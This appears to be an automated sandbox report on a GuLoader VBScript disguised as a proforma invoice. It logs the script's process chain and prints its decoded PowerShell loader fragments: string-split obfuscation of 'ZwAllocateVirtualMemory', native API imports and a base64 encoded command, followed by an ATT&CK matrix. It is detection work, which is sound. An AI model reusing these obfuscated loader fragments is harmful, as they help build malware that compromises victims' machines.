    Source: C:\Windows\System32\wscript.exeProcess created: Base64 decoded #Nels Parapsyk Antih Dudelsac desul Murphied Mldr Louthe Accumbentk Pectoralis Duvet Opsprtn neddies Udsving Analysea Faresglo Demar Bluebel Couridah offlic #Rullest Lachrymat Barythym Maris tolseykul Uudslukke Satsbille Alvidend Udgangsfor Vedga Ferielukn Reyk Chasser Equalli Forsten muski Unpeel Spekta Jungmandun indukt Isol Skelnemrk Dgnfl Folkere Afpasn Dally Landgangs Henriksen Molbohis Sanering Grutn Stakladern Arch $C32 = [char]34 + "Z" + "wA"+"ll"+"oc"+"ateVir"+"tualM"+"e"+"m"+"ory" + [char]34#Commanding underbe Aporr Unfutil Julianistb Bagkldning Seren Conv Osteopla Unprefera Samme Semispira Regensiane Fehso Skov Komplette Redse Disputdag Fauc Semi galact Noropianic Millisekun Begrebsd Kdfar Misogy Topforsp Cprf livsbeti Ordre Mldeinodo Eksamen Uddannelse Add-Type -TypeDefinition @"using System;using System.Runtime.InteropServices;public static class Skyd1{[DllImport("kernel32.dll")]public static extern IntPtr EnumTimeFormatsA(uint Derivativt5,int Derivativt6, int Derivativt7);[DllImport("kernel32.dll")]public static extern IntPtr CreatePipe(uint Derivativt5,int Derivativt6, int Derivativt7);[DllImport("ntdll.dll", EntryPoint=$C32)]public static extern int Fida(int Skyd6,ref Int32 lndgh,int Derivativt,ref Int32 Skyd,int Rgende142,int Skyd7);[DllImport("kernel32.dll")]public static extern IntPtr GetFileTime(uint Derivativt5,int Derivativt6);}"@#borts Fygehent Ostindiefa Densificat Excel udenrigsm vasicentri Wineskinav Skibs
    Source: C:\Windows\System32\wscript.exeProcess created: Base64 decoded #Nels Parapsyk Antih Dudelsac desul Murphied Mldr Louthe Accumbentk Pectoralis Duvet Opsprtn neddies Udsving Analysea Faresglo Demar Bluebel Couridah offlic #Rullest Lachrymat Barythym Maris tolseykul Uudslukke Satsbille Alvidend Udgangsfor Vedga Ferielukn Reyk Chasser Equalli Forsten muski Unpeel Spekta Jungmandun indukt Isol Skelnemrk Dgnfl Folkere Afpasn Dally Landgangs Henriksen Molbohis Sanering Grutn Stakladern Arch $C32 = [char]34 + "Z" + "wA"+"ll"+"oc"+"ateVir"+"tualM"+"e"+"m"+"ory" + [char]34#Commanding underbe Aporr Unfutil Julianistb Bagkldning Seren Conv Osteopla Unprefera Samme Semispira Regensiane Fehso Skov Komplette Redse Disputdag Fauc Semi galact Noropianic Millisekun Begrebsd Kdfar Misogy Topforsp Cprf livsbeti Ordre Mldeinodo Eksamen Uddannelse Add-Type -TypeDefinition @"using System;using System.Runtime.InteropServices;public static class Skyd1{[DllImport("kernel32.dll")]public static extern IntPtr EnumTimeFormatsA(uint Derivativt5,int Derivativt6, int Derivativt7);[DllImport("kernel32.dll")]public static extern IntPtr CreatePipe(uint Derivativt5,int Derivativt6, int Derivativt7);[DllImport("ntdll.dll", EntryPoint=$C32)]public static extern int Fida(int Skyd6,ref Int32 lndgh,int Derivativt,ref Int32 Skyd,int Rgende142,int Skyd7);[DllImport("kernel32.dll")]public static extern IntPtr GetFileTime(uint Derivativt5,int Derivativt6);}"@#borts Fygehent Ostindiefa Densificat Excel udenrigsm vasicentri Wineskinav SkibsJump to behavior
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "IwBOAGUAbABzACAAUABhAHIAYQBwAHMAeQBrACAAQQBuAHQAaQBoACAARAB1AGQAZQBsAHMAYQBjACAAZABlAHMAdQBsACAATQB1AHIAcABoAGkAZQBkACAATQBsAGQAcgAgAEwAbwB1AHQAaABlACAAQQBjAGMAdQBtAGIAZQBuAHQAawAgAFAAZQBjAHQAbwByAGEAbABpAHMAIABEAHUAdgBlAHQAIABPAHAAcwBwAHIAdABuACAAbgBlAGQAZABpAGUAcwAgAFUAZABzAHYAaQBuAGcAIABBAG4AYQBsAHkAcwBlAGEAIABGAGEAcgBlAHMAZwBsAG8AIABEAGUAbQBhAHIAIABCAGwAdQBlAGIAZQBsACAAQwBvAHUAcgBpAGQAYQBoACAAbwBmAGYAbABpAGMAIAANAAoAIwBSAHUAbABsAGUAcwB0ACAATABhAGMAaAByAHkAbQBhAHQAIABCAGEAcgB5AHQAaAB5AG0AIABNAGEAcgBpAHMAIAB0AG8AbABzAGUAeQBrAHUAbAAgAFUAdQBkAHMAbAB1AGsAawBlACAAUwBhAHQAcwBiAGkAbABsAGUAIABBAGwAdgBpAGQAZQBuAGQAIABVAGQAZwBhAG4AZwBzAGYAbwByACAAVgBlAGQAZwBhACAARgBlAHIAaQBlAGwAdQBrAG4AIABSAGUAeQBrACAAQwBoAGEAcwBzAGUAcgAgAEUAcQB1AGEAbABsAGkAIABGAG8AcgBzAHQAZQBuACAAbQB1AHMAawBpACAAVQBuAHAAZQBlAGwAIABTAHAAZQBrAHQAYQAgAEoAdQBuAGcAbQBhAG4AZAB1AG4AIABpAG4AZAB1AGsAdAAgAEkAcwBvAGwAIABTAGsAZQBsAG4AZQBtAHIAawAgAEQAZwBuAGYAbAAgAEYAbwBsAGsAZQByAGUAIABBAGYAcABhAHMAbgAgAEQAYQBsAGwAeQAgAEwAYQBuAGQAZwBhAG4AZwBzACAASABlAG4AcgBpAGsAcwBlAG4AIABNAG8AbABiAG8AaABpAHMAIABTAGEAbgBlAHIAaQBuAGcAIABHAHIAdQB0AG4AIABTAHQAYQBrAGwAYQBkAGUAcgBuACAAQQByAGMAaAAgAA0ACgAkAEMAMwAyACAAPQAgAFsAYwBoAGEAcgBdADMANAAgACsAIAAiAFoAIgAgACsAIAAiAHcAQQAiACsAIgBsAGwAIgArACIAbwBjACIAKwAiAGEAdABlAFYAaQByACIAKwAiAHQAdQBhAGwATQAiACsAIgBlACIAKwAiAG0AIgArACIAbwByAHkAIgAgACsAIABbAGMAaABhAHIAXQAzADQADQAKACMAQwBvAG0AbQBhAG4AZABpAG4AZwAgAHUAbgBkAGUAcgBiAGUAIABBAHAAbwByAHIAIABVAG4AZgB1AHQAaQBsACAASgB1AGwAaQBhAG4AaQBzAHQAYgAgAEIAYQBnAGsAbABkAG4AaQBuAGcAIABTAGUAcgBlAG4AIABDAG8AbgB2ACAATwBzAHQAZQBvAHAAbABhACAAVQBuAHAAcgBlAGYAZQByAGEAIABTAGEAbQBtAGUAIABTAGUAbQBpAHMAcABpAHIAYQAgAFIAZQBnAGUAbgBzAGkAYQBuAGUAIABGAGUAaABzAG8AIABTAGsAbwB2ACAASwBvAG0AcABsAGUAdAB0AGUAIABSAGUAZABzAGUAIABEAGkAcwBwAHUAdABkAGEAZwAgAEYAYQB1AGMAIABTAGUAbQBpACAAZwBhAGwAYQBjAHQAIABOAG8AcgBvAHAAaQBhAG4AaQBjACAATQBpAGwAbABpAHMAZQBrAHUAbgAgAEIAZQBnAHIAZQBiAHMAZAAgAEsAZABmAGEAcgAgAE0AaQBzAG8AZwB5ACAAVABvAHAAZgBvAHIAcwBwACAAQwBwAHIAZgAgAGwAaQB2AHMAYgBlAHQAaQAgAE8AcgBkAHIAZQAgAE0AbABkAGUAaQBuAG8AZABvACAARQBrAHMAYQBtAGUAbgAgAFUAZABkAGEAbgBuAGUAbABzAGUAIAANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AUgB1AG4AdABpAG0AZQAuAEkAbgB0AGUAcgBvAHAAUwBlAHIAdgBpAGMAZQBzADsADQAKAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABjAGwAYQBzAHMAIABTAGsAeQBkADEADQAKAHsADQAKAFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQBsADMAMgAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAARQBuAHUAbQBUAGkAbQBlAEYAbwByAG0AYQB0AHMAQQAoAHUAaQBuAHQAIABEAGUAcgBpAHYAYQB0AGkAdgB0ADUALABpAG4AdAAgAEQAZQByAGkAdgBhAHQAaQB2AHQANgAsACAAaQBuAHQAIABEAGUAcgBpAHYAYQB0AGkAdgB0ADcAKQA7AA0ACgANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUA
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "IwBOAGUAbABzACAAUABhAHIAYQBwAHMAeQBrACAAQQBuAHQAaQBoACAARAB1AGQAZQBsAHMAYQBjACAAZABlAHMAdQBsACAATQB1AHIAcABoAGkAZQBkACAATQBsAGQAcgAgAEwAbwB1AHQAaABlACAAQQBjAGMAdQBtAGIAZQBuAHQAawAgAFAAZQBjAHQAbwByAGEAbABpAHMAIABEAHUAdgBlAHQAIABPAHAAcwBwAHIAdABuACAAbgBlAGQAZABpAGUAcwAgAFUAZABzAHYAaQBuAGcAIABBAG4AYQBsAHkAcwBlAGEAIABGAGEAcgBlAHMAZwBsAG8AIABEAGUAbQBhAHIAIABCAGwAdQBlAGIAZQBsACAAQwBvAHUAcgBpAGQAYQBoACAAbwBmAGYAbABpAGMAIAANAAoAIwBSAHUAbABsAGUAcwB0ACAATABhAGMAaAByAHkAbQBhAHQAIABCAGEAcgB5AHQAaAB5AG0AIABNAGEAcgBpAHMAIAB0AG8AbABzAGUAeQBrAHUAbAAgAFUAdQBkAHMAbAB1AGsAawBlACAAUwBhAHQAcwBiAGkAbABsAGUAIABBAGwAdgBpAGQAZQBuAGQAIABVAGQAZwBhAG4AZwBzAGYAbwByACAAVgBlAGQAZwBhACAARgBlAHIAaQBlAGwAdQBrAG4AIABSAGUAeQBrACAAQwBoAGEAcwBzAGUAcgAgAEUAcQB1AGEAbABsAGkAIABGAG8AcgBzAHQAZQBuACAAbQB1AHMAawBpACAAVQBuAHAAZQBlAGwAIABTAHAAZQBrAHQAYQAgAEoAdQBuAGcAbQBhAG4AZAB1AG4AIABpAG4AZAB1AGsAdAAgAEkAcwBvAGwAIABTAGsAZQBsAG4AZQBtAHIAawAgAEQAZwBuAGYAbAAgAEYAbwBsAGsAZQByAGUAIABBAGYAcABhAHMAbgAgAEQAYQBsAGwAeQAgAEwAYQBuAGQAZwBhAG4AZwBzACAASABlAG4AcgBpAGsAcwBlAG4AIABNAG8AbABiAG8AaABpAHMAIABTAGEAbgBlAHIAaQBuAGcAIABHAHIAdQB0AG4AIABTAHQAYQBrAGwAYQBkAGUAcgBuACAAQQByAGMAaAAgAA0ACgAkAEMAMwAyACAAPQAgAFsAYwBoAGEAcgBdADMANAAgACsAIAAiAFoAIgAgACsAIAAiAHcAQQAiACsAIgBsAGwAIgArACIAbwBjACIAKwAiAGEAdABlAFYAaQByACIAKwAiAHQAdQBhAGwATQAiACsAIgBlACIAKwAiAG0AIgArACIAbwByAHkAIgAgACsAIABbAGMAaABhAHIAXQAzADQADQAKACMAQwBvAG0AbQBhAG4AZABpAG4AZwAgAHUAbgBkAGUAcgBiAGUAIABBAHAAbwByAHIAIABVAG4AZgB1AHQAaQBsACAASgB1AGwAaQBhAG4AaQBzAHQAYgAgAEIAYQBnAGsAbABkAG4AaQBuAGcAIABTAGUAcgBlAG4AIABDAG8AbgB2ACAATwBzAHQAZQBvAHAAbABhACAAVQBuAHAAcgBlAGYAZQByAGEAIABTAGEAbQBtAGUAIABTAGUAbQBpAHMAcABpAHIAYQAgAFIAZQBnAGUAbgBzAGkAYQBuAGUAIABGAGUAaABzAG8AIABTAGsAbwB2ACAASwBvAG0AcABsAGUAdAB0AGUAIABSAGUAZABzAGUAIABEAGkAcwBwAHUAdABkAGEAZwAgAEYAYQB1AGMAIABTAGUAbQBpACAAZwBhAGwAYQBjAHQAIABOAG8AcgBvAHAAaQBhAG4AaQBjACAATQBpAGwAbABpAHMAZQBrAHUAbgAgAEIAZQBnAHIAZQBiAHMAZAAgAEsAZABmAGEAcgAgAE0AaQBzAG8AZwB5ACAAVABvAHAAZgBvAHIAcwBwACAAQwBwAHIAZgAgAGwAaQB2AHMAYgBlAHQAaQAgAE8AcgBkAHIAZQAgAE0AbABkAGUAaQBuAG8AZABvACAARQBrAHMAYQBtAGUAbgAgAFUAZABkAGEAbgBuAGUAbABzAGUAIAANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AUgB1AG4AdABpAG0AZQAuAEkAbgB0AGUAcgBvAHAAUwBlAHIAdgBpAGMAZQBzADsADQAKAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABjAGwAYQBzAHMAIABTAGsAeQBkADEADQAKAHsADQAKAFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQBsADMAMgAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAARQBuAHUAbQBUAGkAbQBlAEYAbwByAG0AYQB0AHMAQQAoAHUAaQBuAHQAIABEAGUAcgBpAHYAYQB0AGkAdgB0ADUALABpAG4AdAAgAEQAZQByAGkAdgBhAHQAaQB2AHQANgAsACAAaQBuAHQAIABEAGUAcgBpAHYAYQB0AGkAdgB0ADcAKQA7AA0ACgANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAJump to behavior
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "IwBOAGUAbABzACAAUABhAHIAYQBwAHMAeQBrACAAQQBuAHQAaQBoACAARAB1AGQAZQBsAHMAYQBjACAAZABlAHMAdQBsACAATQB1AHIAcABoAGkAZQBkACAATQBsAGQAcgAgAEwAbwB1AHQAaABlACAAQQBjAGMAdQBtAGIAZQBuAHQAawAgAFAAZQBjAHQAbwByAGEAbABpAHMAIABEAHUAdgBlAHQAIABPAHAAcwBwAHIAdABuACAAbgBlAGQAZABpAGUAcwAgAFUAZABzAHYAaQBuAGcAIABBAG4AYQBsAHkAcwBlAGEAIABGAGEAcgBlAHMAZwBsAG8AIABEAGUAbQBhAHIAIABCAGwAdQBlAGIAZQBsACAAQwBvAHUAcgBpAGQAYQBoACAAbwBmAGYAbABpAGMAIAANAAoAIwBSAHUAbABsAGUAcwB0ACAATABhAGMAaAByAHkAbQBhAHQAIABCAGEAcgB5AHQAaAB5AG0AIABNAGEAcgBpAHMAIAB0AG8AbABzAGUAeQBrAHUAbAAgAFUAdQBkAHMAbAB1AGsAawBlACAAUwBhAHQAcwBiAGkAbABsAGUAIABBAGwAdgBpAGQAZQBuAGQAIABVAGQAZwBhAG4AZwBzAGYAbwByACAAVgBlAGQAZwBhACAARgBlAHIAaQBlAGwAdQBrAG4AIABSAGUAeQBrACAAQwBoAGEAcwBzAGUAcgAgAEUAcQB1AGEAbABsAGkAIABGAG8AcgBzAHQAZQBuACAAbQB1AHMAawBpACAAVQBuAHAAZQBlAGwAIABTAHAAZQBrAHQAYQAgAEoAdQBuAGcAbQBhAG4AZAB1AG4AIABpAG4AZAB1AGsAdAAgAEkAcwBvAGwAIABTAGsAZQBsAG4AZQBtAHIAawAgAEQAZwBuAGYAbAAgAEYAbwBsAGsAZQByAGUAIABBAGYAcABhAHMAbgAgAEQAYQBsAGwAeQAgAEwAYQBuAGQAZwBhAG4AZwBzACAASABlAG4AcgBpAGsAcwBlAG4AIABNAG8AbABiAG8AaABpAHMAIABTAGEAbgBlAHIAaQBuAGcAIABHAHIAdQB0AG4AIABTAHQAYQBrAGwAYQBkAGUAcgBuACAAQQByAGMAaAAgAA0ACgAkAEMAMwAyACAAPQAgAFsAYwBoAGEAcgBdADMANAAgACsAIAAiAFoAIgAgACsAIAAiAHcAQQAiACsAIgBsAGwAIgArACIAbwBjACIAKwAiAGEAdABlAFYAaQByACIAKwAiAHQAdQBhAGwATQAiACsAIgBlACIAKwAiAG0AIgArACIAbwByAHkAIgAgACsAIABbAGMAaABhAHIAXQAzADQADQAKACMAQwBvAG0AbQBhAG4AZABpAG4AZwAgAHUAbgBkAGUAcgBiAGUAIABBAHAAbwByAHIAIABVAG4AZgB1AHQAaQBsACAASgB1AGwAaQBhAG4AaQBzAHQAYgAgAEIAYQBnAGsAbABkAG4AaQBuAGcAIABTAGUAcgBlAG4AIABDAG8AbgB2ACAATwBzAHQAZQBvAHAAbABhACAAVQBuAHAAcgBlAGYAZQByAGEAIABTAGEAbQBtAGUAIABTAGUAbQBpAHMAcABpAHIAYQAgAFIAZQBnAGUAbgBzAGkAYQBuAGUAIABGAGUAaABzAG8AIABTAGsAbwB2ACAASwBvAG0AcABsAGUAdAB0AGUAIABSAGUAZABzAGUAIABEAGkAcwBwAHUAdABkAGEAZwAgAEYAYQB1AGMAIABTAGUAbQBpACAAZwBhAGwAYQBjAHQAIABOAG8AcgBvAHAAaQBhAG4AaQBjACAATQBpAGwAbABpAHMAZQBrAHUAbgAgAEIAZQBnAHIAZQBiAHMAZAAgAEsAZABmAGEAcgAgAE0AaQBzAG8AZwB5ACAAVABvAHAAZgBvAHIAcwBwACAAQwBwAHIAZgAgAGwAaQB2AHMAYgBlAHQAaQAgAE8AcgBkAHIAZQAgAE0AbABkAGUAaQBuAG8AZABvACAARQBrAHMAYQBtAGUAbgAgAFUAZABkAGEAbgBuAGUAbABzAGUAIAANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AUgB1AG4AdABpAG0AZQAuAEkAbgB0AGUAcgBvAHAAUwBlAHIAdgBpAGMAZQBzADsADQAKAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABjAGwAYQBzAHMAIABTAGsAeQBkADEADQAKAHsADQAKAFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQBsADMAMgAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAARQBuAHUAbQBUAGkAbQBlAEYAbwByAG0AYQB0AHMAQQAoAHUAaQBuAHQAIABEAGUAcgBpAHYAYQB0AGkAdgB0ADUALABpAG4AdAAgAEQAZQByAGkAdgBhAHQAaQB2AHQANgAsACAAaQBuAHQAIABEAGUAcgBpAHYAYQB0AGkAdgB0ADcAKQA7AA0ACgANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\b0raocps\b0raocps.cmdlineJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESED66.tmp" "c:\Users\user\AppData\Local\Temp\b0raocps\CSC533D9109F058485082AFE99DFE1364C9.TMP"Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
    Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
    Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
    Valid Accounts11
    Command and Scripting Interpreter
    Path Interception11
    Process Injection
    1
    Masquerading
    OS Credential Dumping1
    Security Software Discovery
    Remote Services1
    Archive Collected Data
    Exfiltration Over Other Network Medium1
    Encrypted Channel
    Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
    Default Accounts321
    Scripting
    Boot or Logon Initialization ScriptsBoot or Logon Initialization Scripts21
    Virtualization/Sandbox Evasion
    LSASS Memory1
    Process Discovery
    Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothJunk DataExploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
    Domain Accounts2
    PowerShell
    Logon Script (Windows)Logon Script (Windows)11
    Process Injection
    Security Account Manager21
    Virtualization/Sandbox Evasion
    SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationSteganographyExploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
    Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)1
    Deobfuscate/Decode Files or Information
    NTDS1
    Application Window Discovery
    Distributed Component Object ModelInput CaptureScheduled TransferProtocol ImpersonationSIM Card SwapCarrier Billing Fraud
    Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script321
    Scripting
    LSA Secrets1
    File and Directory Discovery
    SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
    Replication Through Removable MediaLaunchdRc.commonRc.common1
    Obfuscated Files or Information
    Cached Domain Credentials12
    System Information Discovery
    VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
    Hide Legend

    Legend:

    • Process
    • Signature
    • Created File
    • DNS/IP Info
    • Is Dropped
    • Is Windows Process
    • Number of created Registry Values
    • Number of created Files
    • Visual Basic
    • Delphi
    • Java
    • .Net C# or VB.NET
    • C, C++ or other language
    • Is malicious
    • Internet
    behaviorgraph top1 signatures2 2 Behavior Graph ID: 680487 Sample: Unclear Proforma Invoice.vbs Startdate: 08/08/2022 Architecture: WINDOWS Score: 80 25 Malicious sample detected (through community Yara rule) 2->25 27 Yara detected GuLoader 2->27 29 Potential malicious VBS script found (suspicious strings) 2->29 8 wscript.exe 1 1 2->8         started        process3 dnsIp4 23 192.168.2.1 unknown unknown 8->23 31 VBScript performs obfuscated calls to suspicious functions 8->31 33 Wscript starts Powershell (via cmd or directly) 8->33 35 Very long command line found 8->35 37 Encrypted powershell cmdline option found 8->37 12 powershell.exe 24 8->12         started        signatures5 process6 process7 14 csc.exe 3 12->14         started        17 conhost.exe 12->17         started        file8 21 